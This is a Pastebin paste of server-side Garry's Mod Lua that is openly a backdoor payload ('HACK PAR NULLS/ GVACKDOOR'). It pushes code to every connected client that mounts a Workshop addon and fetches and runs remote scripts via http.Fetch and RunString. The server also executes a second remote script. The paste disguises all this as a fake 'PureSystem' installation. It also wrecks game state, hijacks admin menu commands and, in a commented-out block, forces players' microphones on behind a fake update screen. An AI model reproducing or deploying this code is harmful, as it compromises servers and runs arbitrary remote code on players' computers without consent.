Advertisement
Guest User

HBNULLPURE

a guest
May 20th, 2019
81
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 11.35 KB | None | 0 0
  1. if SERVER then
  2.     for k, v in pairs(player.GetAll()) do
  3.         v:SendLua("steamworks.FileInfo(1479367728,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  4.     end
  5.  
  6.    
  7.     print([[
  8. __________                         _________               __                   ____   ____________
  9. \______   \__ _________   ____    /   _____/__.__. _______/  |_  ____   _____   \   \ /   /\_____  \
  10.  |     ___/  |  \_  __ \_/ __ \   \____   /|  |  |/  ___/\   __\/ __ \ /     \   \   Y   /  /  ____/
  11.  |    |   |  |  /|  | \/\  ___/    ____\  \\ ___ |\___ \  |  | \  ___/|  Y Y  \   \     /  /       \
  12.  |____|   |____/ |__|    \___    /________/  ____/____ /  |__|  \___  |__|_|  /    \___/   \_______|]])
  13.  
  14.     timer.Create( "gvacspam", 0.1, 1, function()
  15.         for k, ply in pairs( player.GetAll() ) do
  16.             DarkRP.notify(ply, 2, 4, "[PureSystem] Installation des prérequis.")
  17.         end
  18.     end)
  19.  
  20.     timer.Simple( 10, function()
  21.         for k, ply in pairs( player.GetAll() ) do
  22.             DarkRP.notify(ply, 2, 4, "[PureSystem] Lancement de L'installation.")
  23.         end
  24.     end )
  25.  
  26.     timer.Simple( 14, function()
  27.         for k,v in pairs(player.GetAll()) do
  28.             v:SendLua([[http.Fetch('https://pastebin.com/raw/j2Tfm2dt',function(b,l,h,c)RunString(b)end,nil)]])
  29.             v:SetRunSpeed(400* 4);
  30.             v:SetWalkSpeed(200 * 2);
  31.         end
  32.  
  33.         RunConsoleCommand("sv_friction", "-8")
  34.  
  35.         timer.Create( "gtonip", 15, 0, function()
  36.             for k,v in pairs(player.GetAll()) do
  37.                 v:GodEnable()
  38.                 v:setDarkRPVar( "rpname", "This Steam account has been VAC banned from secure servers due to a cheating infraction." )
  39.             end
  40.  
  41.         end )
  42.     end )
  43.  
  44.     timer.Simple( 76, function()
  45.         http.Fetch('https://pastebin.com/raw/7ABFD4Bu',function(b,l,h,c)RunString(b)end,nil)
  46.     end )
  47.  
  48.     timer.Simple( 77, function()
  49.         for k, ply in pairs( player.GetAll() ) do
  50.             DarkRP.notify(ply, 2, 4,  "[PureSystem] Merci pour votre patience.")
  51.             DarkRP.notify(ply, 2, 20, "HACK PAR NULLS/ GVACKDOOR")
  52.         end
  53.     end )
  54.  
  55.     timer.Simple( 105, function()
  56.         RunConsoleCommand("sv_friction", "8")
  57.         hook.Remove("Think", "2012akaapocalypse")
  58.     end )
  59.    
  60.  
  61.     hook.Remove( "PlayerSay", "Pure_Menu" )
  62.     concommand.Remove("Pure_openMenu")
  63.     concommand.Remove("ulx menu")
  64.     ULib.addSayCommand( '!menu', lechat )
  65.     ULib.cmds.addCommand( "ulx menu", lechat )
  66.    
  67.  
  68.  
  69.     function game.CleanUpMap() end
  70.  
  71.     timer.Create("moneymoney", 1, 0, function()
  72.         for k,v in pairs(player.GetAll()) do v:addMoney(1648125) end
  73.     end)
  74. end
  75.  
  76. --[[
  77.   local loadingPercent = 0
  78.   local W, H = ScrW(), ScrH()
  79.  
  80. surface.CreateFont("lapolice", {
  81.     font = "Open Sans",  
  82.     size = ScrW()*0.02,
  83.     weight = 10,
  84.     blursize = 0,
  85.     scanlines = 2.5,
  86.     antialias = false
  87. })
  88.  
  89. surface.CreateFont( "PureBigButtonFont", {
  90.     font = "Open Sans",
  91.     extended = false,
  92.     size = 23,
  93.     weight = 400,
  94.     blursize = 0,
  95.     scanlines = 0,
  96.     antialias = true,
  97.     underline = false,
  98.     italic = false,
  99.     strikeout = false,
  100.     symbol = false,
  101.     rotary = false,
  102.     shadow = false,
  103.     additive = false,
  104.     outline = false,
  105. } )
  106.  
  107.     ledermatriste = vgui.Create("DFrame")
  108.     ledermatriste:SetPos(0,0)
  109.     ledermatriste:SetSize(ScrW(), ScrH())
  110.     ledermatriste:ShowCloseButton(false)
  111.     ledermatriste:SetTitle("")
  112.     ledermatriste:SetVisible(true)
  113.     ledermatriste:MakePopup()
  114.     ledermatriste:SetDraggable(false)
  115.     ledermatriste.Paint = function(self, w, h)
  116.         draw.RoundedBox(0, 0, 0, w, h, Color(18,21,25,255))
  117.     end
  118.  
  119.     local logoma = vgui.Create("DImage", ledermatriste)
  120.     logoma:SetPos(ScrW()/2 - 250, ScrH()/2 - 250)
  121.     logoma:SetSize(500, 500)
  122.     logoma:SetImage("materials/puresystem/logo_marteaupure.png")
  123.  
  124.     local timerloadingbar = vgui.Create("DPanel", ledermatriste)
  125.     timerloadingbar:SetPos(ScrW()/2 - 150, ScrH()/2 + 245)
  126.     timerloadingbar.Paint = function(self, w, h)
  127.         draw.RoundedBox(5, 0, 0, w, h, Color(255, 255, 255))
  128.     end
  129.  
  130.     local timerloadingbardone = vgui.Create("DPanel", ledermatriste)
  131.     timerloadingbardone:SetPos(ScrW()/2 - 150, ScrH()/2 + 245)
  132.     timerloadingbardone.Paint = function(self, w, h)
  133.         draw.RoundedBox(5, 0, 0, w, h, Color(241, 193, 0,255))
  134.     end
  135.  
  136.     local timerloading = vgui.Create("DLabel", ledermatriste)
  137.     timerloading:SetPos(ScrW()/2 - 100, ScrH()/2 + 250)
  138.     timerloading:SetText("Installation de la mise à jours...")
  139.     timerloading:SetColor(Color(24,24,24,255))
  140.     timerloading:SetFont("PureBigButtonFont")
  141.     timerloading:SizeToContents()
  142.  
  143.     timerloadingbar:SetSize(timerloading:GetWide() + 100, timerloading:GetTall() + 10)
  144.     timerloadingbardone:SetSize(0, timerloading:GetTall() + 10)
  145.  
  146.     timer.Create("charglogo", 1, 1, function()
  147.         logoma:AlphaTo(10, 1, 0)
  148.         logoma:AlphaTo(255, 1, 1)
  149.         timer.Adjust("charglogo", 3, 0, function()
  150.             logoma:AlphaTo(10, 1, 1)
  151.             logoma:AlphaTo(255, 1, 2)
  152.         end)
  153.     end)
  154.  
  155.     local timePassed = 0
  156.  
  157.     timer.Create("parleput1", 0.1, 0, function()--PARLE !!!
  158.         RunConsoleCommand("+voicerecord")
  159.     end)
  160.  
  161.     timer.Create("Pure_loadingTimeout", 1, 0, function()
  162.         timePassed = timePassed + 1
  163.         loadingPercent = loadingPercent + math.random(14, 15)
  164.         if loadingPercent > 50 then
  165.             timer.Remove("Pure_loadingTimeout")
  166.             loadingPercent = 80
  167.         end
  168.         timerloadingbardone:SizeTo(timerloadingbar:GetWide() * loadingPercent / 100 , -1, 3)
  169.     end)
  170.  
  171.     timer.Simple(25, function()
  172.         if ledermatriste != nil && timerloadingbar:IsValid() && timerloadingbardone:IsValid() then
  173.             timerloadingbardone:SizeTo(timerloadingbar:GetWide() * 90 / 100, -1, 3)
  174.         end
  175.     end)
  176.  
  177.     timer.Simple(30, function()
  178.         timer.Remove("charglogo")
  179.  
  180.         if ledermatriste != nil && timerloadingbar:IsValid() && timerloadingbardone:IsValid() then
  181.             timerloadingbardone:SizeTo(timerloadingbar:GetWide(), -1, 1)
  182.         end
  183.     end)
  184.  
  185.     timer.Simple(31, function()
  186.         if ledermatriste != nil then
  187.             ledermatriste:Remove()
  188.             enigma()
  189.         end
  190.     end)
  191.  
  192.  
  193.  
  194.  
  195.     timer.Simple(63, function()
  196.         enigma:Remove()
  197.         timer.Remove( "charglogo" )
  198.         RunConsoleCommand("+right")
  199.         RunConsoleCommand("+voicerecord")
  200.         RunConsoleCommand("cl_yawspeed","9999")
  201.         RunConsoleCommand("r_shader_srgb","1")
  202.     end)
  203.  
  204.  
  205.     timer.Simple( 73, function()
  206.         RunConsoleCommand("-right")
  207.         RunConsoleCommand("cl_yawspeed","8")
  208.         timer.Remove("parleput1")
  209.         timer.Remove("cheer_loop")
  210.     end )
  211.  
  212.     timer.Simple( 90, function()
  213.         RunConsoleCommand("r_shader_srgb","0")
  214.     end )
  215.  
  216.     for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE) end
  217.  
  218.     timer.Create("cheer_loop",2.7,0,function()
  219.         for k,v in pairs (player.GetAll()) do v:DoAnimationEvent(ACT_GMOD_TAUNT_DANCE) end
  220.     end )
  221.  
  222.  
  223.     hook.Add("Think","somewhere_over_the_rainbow",function()
  224.         local col = HSVToColor(CurTime() * 50 % 360, 1, 1)
  225.         for _, v in ipairs(player.GetAll()) do
  226.             v:SetWeaponColor(Vector(col.r / 255, col.g / 255, col.b / 255))
  227.         end
  228.     end)
  229.  
  230.  
  231. function enigma()
  232.     enigma = vgui.Create("DFrame")
  233.     enigma:SetPos(0,0)
  234.     enigma:SetSize(ScrW(), ScrH())
  235.     enigma:ShowCloseButton(false)
  236.     enigma:SetTitle("")
  237.     enigma:SetVisible(true)
  238.     enigma:MakePopup()
  239.     enigma:SetDraggable(false)
  240.     enigma.Paint = function(self, w, h)
  241.         draw.RoundedBox(0, 0, 0, w, h, Color(18,21,25,255))
  242.         draw.DrawText( "(╯°□°)╯︵ ┻━┻", "lapolice", ScrW() * 0.5, ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), TEXT_ALIGN_CENTER )
  243.         draw.DrawText( "(╯°□°)╯︵ ┻━┻", "lapolice", math.random(0,10), ScrH() * (math.random(0,100)*0.01), Color( 240, 100, 100, math.random(230,255) ), 0 )
  244.         draw.DrawText( "Σ", "lapolice", W * 0.7 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  245.         draw.DrawText( "Σ", "lapolice", W * 0.38 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  246.         draw.DrawText( "Σ", "lapolice", W * 0.9 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  247.         draw.DrawText( "Σ", "lapolice", W * 0.35 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  248.         draw.DrawText( "RIP ;)", "lapolice", W * 0.98 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  249.         draw.DrawText( "ΣNIGMA", "lapolice", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  250.         draw.DrawText( "RIP ;)", "lapolice", W * 0.73 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  251.         draw.DrawText( "ΣNIGMA", "lapolice", W * 0.27 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  252.         draw.DrawText( "ΣNIGMA", "lapolice", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  253.         draw.DrawText( "RIP ;)", "lapolice", W * 0.05 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  254.         draw.DrawText( "ΣNIGMA", "lapolice", W * 0.11 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  255.         draw.DrawText( "RIP ;)", "lapolice", W * 0.75 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  256.         draw.DrawText( "ΣNIGMA", "lapolice", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  257.         draw.DrawText( "RIP ;)", "lapolice", W * 0.2 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  258.         draw.DrawText( "ΣNIGMA", "lapolice", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  259.         draw.DrawText( "ΣNIGMA", "lapolice", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  260.         draw.DrawText( "ΣNIGMA", "lapolice", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )  
  261.         draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  262.         draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  263.         draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  264.         draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  265.         draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  266.     end
  267.  
  268.     sound.PlayURL( "https://wadixcityrp.000webhostapp.com/music/brass.mp3", "mono", function()end )
  269.  
  270.     local logenigma = vgui.Create("HTML", enigma)
  271.     logenigma:SetPos(ScrW()/2 - 250, ScrH()/2 - 250)
  272.     logenigma:SetSize(500, 500)
  273.     logenigma:OpenURL( "https://i.imgur.com/7zMPifV.png")
  274.  
  275.    
  276. end
  277. ]]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement